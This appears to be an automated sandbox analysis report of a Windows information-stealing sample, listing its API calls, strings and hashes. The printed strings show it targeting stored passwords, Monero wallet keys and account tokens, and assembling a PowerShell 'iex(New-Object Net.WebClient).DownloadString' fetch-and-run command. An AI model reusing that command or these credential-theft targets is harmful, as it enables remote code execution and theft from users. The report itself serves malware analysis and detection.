                    • Instruction ID: 9a885ba8284899ad53684a27fc9360f6c434bf820ca866376cc0e5f5fd5da9c0
                    • Opcode Fuzzy Hash: 688366280e543173653ff98a44ce885d2fdbfbe997a798896d40fe845111ef66
                    • Instruction Fuzzy Hash: 6D3150B2D00109EFCB06EBA4DC45EFE7778FB94305B144518F206EB690DB38A94ADB52
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0118F490,00000000,?,003D0E2C,00000000,?,00000000), ref: 003C8130
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C8137
                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 003C8158
                    • __aulldiv.LIBCMT ref: 003C8172
                    • __aulldiv.LIBCMT ref: 003C8180
                    • wsprintfA.USER32 ref: 003C81AC
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                    • String ID: %d MB$@
                    • API String ID: 2774356765-3474575989
                    • Opcode ID: 7c222c684260b151f3e4f43421d56f02b2afd62acf0ee7c741a1f4eeb7b7dc48
                    • Instruction ID: 29721bd04ae949e26c84d7c6cc42b4900d7e71cb4257753559b294a54e916ff3
                    • Opcode Fuzzy Hash: 7c222c684260b151f3e4f43421d56f02b2afd62acf0ee7c741a1f4eeb7b7dc48
                    • Instruction Fuzzy Hash: ED214AB1E44208ABDB00DFD4DC49FAEB7B8FB44B10F104619F605FB280D7B869058BA6
                    APIs
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                      • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                    • InternetOpenA.WININET(003D0DF7,00000001,00000000,00000000,00000000), ref: 003B610F
                    • StrCmpCA.SHLWAPI(?,0118FA48), ref: 003B6147
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 003B618F
                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003B61B3
                    • InternetReadFile.WININET(?,?,00000400,?), ref: 003B61DC
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003B620A
                    • CloseHandle.KERNEL32(?,?,00000400), ref: 003B6249
                    • InternetCloseHandle.WININET(?), ref: 003B6253
                    • InternetCloseHandle.WININET(00000000), ref: 003B6260
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                    • String ID:
                    • API String ID: 2507841554-0
                    • Opcode ID: 50c155ab36c4999e7e6e5dbf1be053508aa9d356cfb308af49be3c832f65282c
                    • Instruction ID: 4c847b5f92547aa9aa4c472592747f4427b2d474b6c25edaf03a9891157dcf63
                    • Opcode Fuzzy Hash: 50c155ab36c4999e7e6e5dbf1be053508aa9d356cfb308af49be3c832f65282c
                    • Instruction Fuzzy Hash: 685151B1900218ABEF21DF50DC46FEE77B8EB44705F104498A609AB181DB786E89DF56
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003B733A
                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003B73B1
                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003B740D
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 003B7452
                    • HeapFree.KERNEL32(00000000), ref: 003B7459
                    • task.LIBCPMTD ref: 003B7555
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Heap$EnumFreeOpenProcessValuetask
                    • String ID: Password
                    • API String ID: 775622407-3434357891
                    • Opcode ID: 74ffb8def664070034f0b2d34a8f65d51592d86827cdb1d798a57db971168127
                    • Instruction ID: eb87bc02d6c51890a1fba32c41175109ba454f1f5c0e8cb718ae2d4be2a6b1c7
                    • Opcode Fuzzy Hash: 74ffb8def664070034f0b2d34a8f65d51592d86827cdb1d798a57db971168127
                    • Instruction Fuzzy Hash: EA613AB580015C9BDB25DB50CC41BD9B7BCFF44344F0081E9E649AA541DBB06BC9CFA1
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                    • lstrlen.KERNEL32(00000000), ref: 003BBC9F
                      • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 003BBCCD
                    • lstrlen.KERNEL32(00000000), ref: 003BBDA5
                    • lstrlen.KERNEL32(00000000), ref: 003BBDB9
                    Strings
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                    • API String ID: 3073930149-1079375795
                    • Opcode ID: 8490720ec5494e58dad2468ed78b6902623de664aa42ef0feaf44a688d966781
                    • Instruction ID: 8b349ba6630c5a84d4919631cb095fd2e3d384b74774e7fe4c4b960573f107c5
                    • Opcode Fuzzy Hash: 8490720ec5494e58dad2468ed78b6902623de664aa42ef0feaf44a688d966781
                    • Instruction Fuzzy Hash: 29B14F7291060CABCB16EBA0DC96FEE7738AF14304F40411DF506EA191EF346E49DBA2
                    APIs
                    Strings
                    Yara matches
                    Similarity
                    • API ID: ExitProcess$DefaultLangUser
                    • String ID: *
                    • API String ID: 1494266314-163128923
                    • Opcode ID: f9afa345c12018d2eae8d1ec2b603b5f23400d18394b99d0ac7edb34d965273b
                    • Instruction ID: a79ac0625bf06b943f8941eb23a973f99bbf764d110ce332375c1318bccb9d38
                    • Opcode Fuzzy Hash: f9afa345c12018d2eae8d1ec2b603b5f23400d18394b99d0ac7edb34d965273b
                    • Instruction Fuzzy Hash: 70F03A70905209EFD344AFE0A90AF3C7B74FB15702F040198E609C6290D6786A42EBD7
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003B4FCA
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003B4FD1
                    • InternetOpenA.WININET(003D0DDF,00000000,00000000,00000000,00000000), ref: 003B4FEA
                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 003B5011
                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 003B5041
                    • InternetCloseHandle.WININET(?), ref: 003B50B9
                    • InternetCloseHandle.WININET(?), ref: 003B50C6
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                    • String ID:
                    • API String ID: 3066467675-0
                    • Opcode ID: a544dbdc07966c80c60458226fd6cff2b59f95e09c9a37ca9f4cb405f0db1309
                    • Instruction ID: 6259746f4d44f974cf7354a5da91195850c6484d2b3fa0890cfae8b787a18b8f
                    • Opcode Fuzzy Hash: a544dbdc07966c80c60458226fd6cff2b59f95e09c9a37ca9f4cb405f0db1309
                    • Instruction Fuzzy Hash: CC3104F4A00218ABDB20DF54DC85BECB7B4EB48704F1081D9EB09A7281D7746E85DF99
                    APIs
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003C8426
                    • wsprintfA.USER32 ref: 003C8459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 003C847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 003C848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 003C8499
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                    • RegQueryValueExA.ADVAPI32(00000000,0118F550,00000000,000F003F,?,00000400), ref: 003C84EC
                    • lstrlen.KERNEL32(?), ref: 003C8501
                    • RegQueryValueExA.ADVAPI32(00000000,0118F538,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,003D0B34), ref: 003C8599
                    • RegCloseKey.ADVAPI32(00000000), ref: 003C8608
                    • RegCloseKey.ADVAPI32(00000000), ref: 003C861A
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                    • String ID: %s\%s
                    • API String ID: 3896182533-4073750446
                    • Opcode ID: 817c8640f7a3461a7dc5717c3fc23fb243e9ec87061811771982600a308b6b4e
                    • Instruction ID: c70d5beb1f4cedb2f641c68381e998d21180b193c8f935f36136821ecee6ad10
                    • Opcode Fuzzy Hash: 817c8640f7a3461a7dc5717c3fc23fb243e9ec87061811771982600a308b6b4e
                    • Instruction Fuzzy Hash: 6F2107B190021CABDB24DB54DC85FE9B3B8FB48700F00C199E609A6140DF75AE85CFD5
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C76A4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C76AB
                    • RegOpenKeyExA.ADVAPI32(80000002,0117B810,00000000,00020119,00000000), ref: 003C76DD
                    • RegQueryValueExA.ADVAPI32(00000000,0118F5B0,00000000,00000000,?,000000FF), ref: 003C76FE
                    • RegCloseKey.ADVAPI32(00000000), ref: 003C7708
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: Windows 11
                    • API String ID: 3225020163-2517555085
                    • Opcode ID: b497db51f70792eaa88b22fe8c34f5073883920e04588d228c3dfb8609a54ea2
                    • Instruction ID: ea2b0a26e58897f281ae0e947e730695a64ec4350a0d508d08704cb289aa3262
                    • Opcode Fuzzy Hash: b497db51f70792eaa88b22fe8c34f5073883920e04588d228c3dfb8609a54ea2
                    • Instruction Fuzzy Hash: 4E0144F5A44208BBD700DBE4DC49F79B7B8EB58701F104458FE08D7291D6B49904DF52
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7734
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C773B
                    • RegOpenKeyExA.ADVAPI32(80000002,0117B810,00000000,00020119,003C76B9), ref: 003C775B
                    • RegQueryValueExA.ADVAPI32(003C76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 003C777A
                    • RegCloseKey.ADVAPI32(003C76B9), ref: 003C7784
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: CurrentBuildNumber
                    • API String ID: 3225020163-1022791448
                    • Opcode ID: 53a41c90866e816f83022be59d95ef1cf843d63afd6d6fbff17b90e5bc52a9a2
                    • Instruction ID: d1c3a48c1d02e7ed2676f8490da3da317c29b4db69d1c358c65fd46f3afc253e
                    • Opcode Fuzzy Hash: 53a41c90866e816f83022be59d95ef1cf843d63afd6d6fbff17b90e5bc52a9a2
                    • Instruction Fuzzy Hash: B801F4F5A40308BBD700DBE4DC49FBEB7B8EB58705F104559FA09E7281D6B46A04DB52
                    APIs
                    • CreateFileA.KERNEL32(:<,80000000,00000003,00000000,00000003,00000080,00000000,?,003C3AEE,?), ref: 003C92FC
                    • GetFileSizeEx.KERNEL32(000000FF,:<), ref: 003C9319
                    • CloseHandle.KERNEL32(000000FF), ref: 003C9327
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSize
                    • String ID: :<$:<
                    • API String ID: 1378416451-3602519871
                    • Opcode ID: bf632e79d7803aa5d97ed97156a55f01e0fbf6d4586aee1ff320fc3b220a7b61
                    • Instruction ID: c72d0dcd150087e7a7636330a3ebcbc2f555d59894d98e752ce3a3a416872c1b
                    • Opcode Fuzzy Hash: bf632e79d7803aa5d97ed97156a55f01e0fbf6d4586aee1ff320fc3b220a7b61
                    • Instruction Fuzzy Hash: CDF06978E00208ABDB10DBA0DC48FAE77B9EB58310F118658A615EB2C0E674AA019F41
                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                    • LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                    • ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                    • LocalFree.KERNEL32(003B148F), ref: 003B9A90
                    • CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                    • String ID:
                    • API String ID: 2311089104-0
                    • Opcode ID: 859882abf5eb2d799d021389ce371f4b464c155afba2859eb5ba792637f72558
                    • Instruction ID: 773ac2a541669889e8f121242a5ee72838f2d82e3db1c1fa7db2aed3eebb0c3b
                    • Opcode Fuzzy Hash: 859882abf5eb2d799d021389ce371f4b464c155afba2859eb5ba792637f72558
                    • Instruction Fuzzy Hash: D3314AB4A00209EFDB11CF94C885FEE77B8FF48344F108159EA05A7290D778A945CFA1
                    APIs
                    • lstrcat.KERNEL32(?,0118F790), ref: 003C47DB
                      • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 003C4801
                    • lstrcat.KERNEL32(?,?), ref: 003C4820
                    • lstrcat.KERNEL32(?,?), ref: 003C4834
                    • lstrcat.KERNEL32(?,0117A688), ref: 003C4847
                    • lstrcat.KERNEL32(?,?), ref: 003C485B
                    • lstrcat.KERNEL32(?,0118E6D0), ref: 003C486F
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003C8D90: GetFileAttributesA.KERNEL32(00000000,?,003B1B54,?,?,003D564C,?,?,003D0E1F), ref: 003C8D9F
                      • Part of subcall function 003C4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003C4580
                      • Part of subcall function 003C4570: RtlAllocateHeap.NTDLL(00000000), ref: 003C4587
                      • Part of subcall function 003C4570: wsprintfA.USER32 ref: 003C45A6
                      • Part of subcall function 003C4570: FindFirstFileA.KERNEL32(?,?), ref: 003C45BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                    • String ID:
                    • API String ID: 2540262943-0
                    • Opcode ID: 9b5bdccf638b4d49314775c46bd5f3c8c409f914950d2b0e980101c8c8b3549f
                    • Instruction ID: 24a7359c6c179f93f47c6698a11a5820c73afce746a8abcb13f9322e16690519
                    • Opcode Fuzzy Hash: 9b5bdccf638b4d49314775c46bd5f3c8c409f914950d2b0e980101c8c8b3549f
                    • Instruction Fuzzy Hash: 793143B690021857CB16F7B0DC85FE9737CAB58700F40498DB359EA081EEB59B89CB96
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 003C2D85
                    Strings
                    • ')", xrefs: 003C2CB3
                    • <, xrefs: 003C2D39
                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 003C2CC4
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 003C2D04
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    • API String ID: 3031569214-898575020
                    • Opcode ID: b452a3f3a233318b3e1ea3c401c9dea3fba60abdddf56c0a896aee19f741e9cd
                    • Instruction ID: 1baca096cccafe71e904b938fff64564023542f6a8f27384a31008c03ba9c909
                    • Opcode Fuzzy Hash: b452a3f3a233318b3e1ea3c401c9dea3fba60abdddf56c0a896aee19f741e9cd
                    • Instruction Fuzzy Hash: B141CC71C1060C9BDB1AEBA0D896FEDBB78AF10704F40411DE016EA191DF746E4ADF96
                    APIs
                    • LocalAlloc.KERNEL32(00000040,?), ref: 003B9F41
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$AllocLocal
                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                    • API String ID: 4171519190-1096346117
                    • Opcode ID: 5004923cfb17fc379b7b3a95b0266e3735f8a81c7e567f91c6cd2bcaf07556f8
                    • Instruction ID: 4147b3744b6b6c6a0405b3a7915c12a135900af54dbffde89fcbdb1b19b357c8
                    • Opcode Fuzzy Hash: 5004923cfb17fc379b7b3a95b0266e3735f8a81c7e567f91c6cd2bcaf07556f8
                    • Instruction Fuzzy Hash: C3616E71A1060CABDB25EFA4DC96FED7779AF40308F408018FA0A9F591EB746E05CB52
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,0118E650,00000000,00020119,?), ref: 003C40F4
                    • RegQueryValueExA.ADVAPI32(?,0118F718,00000000,00000000,00000000,000000FF), ref: 003C4118
                    • RegCloseKey.ADVAPI32(?), ref: 003C4122
                    • lstrcat.KERNEL32(?,00000000), ref: 003C4147
                    • lstrcat.KERNEL32(?,0118F730), ref: 003C415B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$CloseOpenQueryValue
                    • String ID:
                    • API String ID: 690832082-0
                    • Opcode ID: 59bc8e92497ae53bbf46cce14300a90cb1ee30a8718e8adf6a06eb7cab512513
                    • Instruction ID: e9c00bd7f9cae08cd9909de0afa4d0a4de52494c3971178b5d0ebcd673d1bd51
                    • Opcode Fuzzy Hash: 59bc8e92497ae53bbf46cce14300a90cb1ee30a8718e8adf6a06eb7cab512513
                    • Instruction Fuzzy Hash: 7D41C9B69001086BDB25EBA0DC56FFD733DA798300F40455CB719DA181EA755B8CCBA3
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7E37
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C7E3E
                    • RegOpenKeyExA.ADVAPI32(80000002,0117BB90,00000000,00020119,?), ref: 003C7E5E
                    • RegQueryValueExA.ADVAPI32(?,0118E730,00000000,00000000,000000FF,000000FF), ref: 003C7E7F
                    • RegCloseKey.ADVAPI32(?), ref: 003C7E92
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: 5b34ea4eecd0326288590d2f71ca95e0273495d980ad2beb0b199cd3f5f22713
                    • Instruction ID: e85c1ecc16446364ce3b0934064599ffd3f32c8200985fa44f81ad494593a789
                    • Opcode Fuzzy Hash: 5b34ea4eecd0326288590d2f71ca95e0273495d980ad2beb0b199cd3f5f22713
                    • Instruction Fuzzy Hash: C3114CB2A44205EBD704DB94DD49FBBBBBCEB08B10F104159FA09E7680D7B85C04DBA2
                    APIs
                    • StrStrA.SHLWAPI(0118F4C0,?,?,?,003C140C,?,0118F4C0,00000000), ref: 003C926C
                    • lstrcpyn.KERNEL32(005FAB88,0118F4C0,0118F4C0,?,003C140C,?,0118F4C0), ref: 003C9290
                    • lstrlen.KERNEL32(?,?,003C140C,?,0118F4C0), ref: 003C92A7
                    • wsprintfA.USER32 ref: 003C92C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpynlstrlenwsprintf
                    • String ID: %s%s
                    • API String ID: 1206339513-3252725368
                    • Opcode ID: 43bbc4e00f3d87f035240d7bcb3cd580fdf1c456c17d71b724d14466df224437
                    • Instruction ID: 0afc4a1688e52f8033987f338d3e6cc24220bfc69061f57e63b56b8b7216a11a
                    • Opcode Fuzzy Hash: 43bbc4e00f3d87f035240d7bcb3cd580fdf1c456c17d71b724d14466df224437
                    • Instruction Fuzzy Hash: 9301A5B650010CFFCB04DFE8D988EAE7BB9EB58354F108548F9099B204C675AA45DB96
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B12B4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003B12BB
                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003B12D7
                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003B12F5
                    • RegCloseKey.ADVAPI32(?), ref: 003B12FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: 6de1493ff53a7841456354805197d34e730598b01b74fe04cfc5db21e95b20e3
                    • Instruction ID: de461f1f6d01fa5fd4c0b9d25407f97388ca57e1dd61a45cad1a211111890de7
                    • Opcode Fuzzy Hash: 6de1493ff53a7841456354805197d34e730598b01b74fe04cfc5db21e95b20e3
                    • Instruction Fuzzy Hash: E1011DB9A40208BBDB00DFE0DC59FAEB7B8EB58705F008159FA09D7280D674AA05DB52
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: String___crt$Type
                    • String ID:
                    • API String ID: 2109742289-3916222277
                    • Opcode ID: 2c895261f7a0417e18621f84c516500534304360478518bcf187e73355fce6d4
                    • Instruction ID: 0699bf5f486fa079279014a8e83aba44c92b32c34e79761f78b6c0470931b037
                    • Opcode Fuzzy Hash: 2c895261f7a0417e18621f84c516500534304360478518bcf187e73355fce6d4
                    • Instruction Fuzzy Hash: 1541D5B151079C5EDB228B248C95FFBBBEC9B45704F1454ACE98AC6182D3719E45CF60
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 003C6663
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 003C6726
                    • ExitProcess.KERNEL32 ref: 003C6755
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                    • String ID: <
                    • API String ID: 1148417306-4251816714
                    • Opcode ID: 96215c5bfe0e19741e2a98074174527409f348d80b52c97200398a2a5d20273e
                    • Instruction ID: de3325791a949387feadf2249f35d5502da3860e8254146ed7fdc4e3064caf6a
                    • Opcode Fuzzy Hash: 96215c5bfe0e19741e2a98074174527409f348d80b52c97200398a2a5d20273e
                    • Instruction Fuzzy Hash: 17312BB1801218ABDB15EB90DC96FEEB778AF14304F404189F209AA191DF746F49CF6A
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003D0E28,00000000,?), ref: 003C882F
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C8836
                    • wsprintfA.USER32 ref: 003C8850
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                    • String ID: %dx%d
                    • API String ID: 1695172769-2206825331
                    • Opcode ID: 107431fd1c2ee97133d0db320e8aa02ac06d2cc23c1940ed8f67f813f8cef26c
                    • Instruction ID: eb02aa605bd98192b8f31695998ac9afe9cf1e1bae56f1fa0d38a7094a7c130c
                    • Opcode Fuzzy Hash: 107431fd1c2ee97133d0db320e8aa02ac06d2cc23c1940ed8f67f813f8cef26c
                    • Instruction Fuzzy Hash: F9212EB1A40208AFDB04DF94DD49FBEBBB8FB48711F104119F609E7280C7799904DBA2
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,003C951E,00000000), ref: 003C8D5B
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C8D62
                    • wsprintfW.USER32 ref: 003C8D78
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesswsprintf
                    • String ID: %hs
                    • API String ID: 769748085-2783943728
                    • Opcode ID: 96e46252852f7e68bb1b72765fe20c8edf5b8c67660739748d09aec4fba0a295
                    • Instruction ID: 45d19c428392a369fac70dcddaa074a484131b273cb21eb045a671427a1b5d68
                    • Opcode Fuzzy Hash: 96e46252852f7e68bb1b72765fe20c8edf5b8c67660739748d09aec4fba0a295
                    • Instruction Fuzzy Hash: 00E08CB1A40208BFD700EB94EC0AE6977B8EB04702F000094FD0DD7280DAB59E04EB93
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
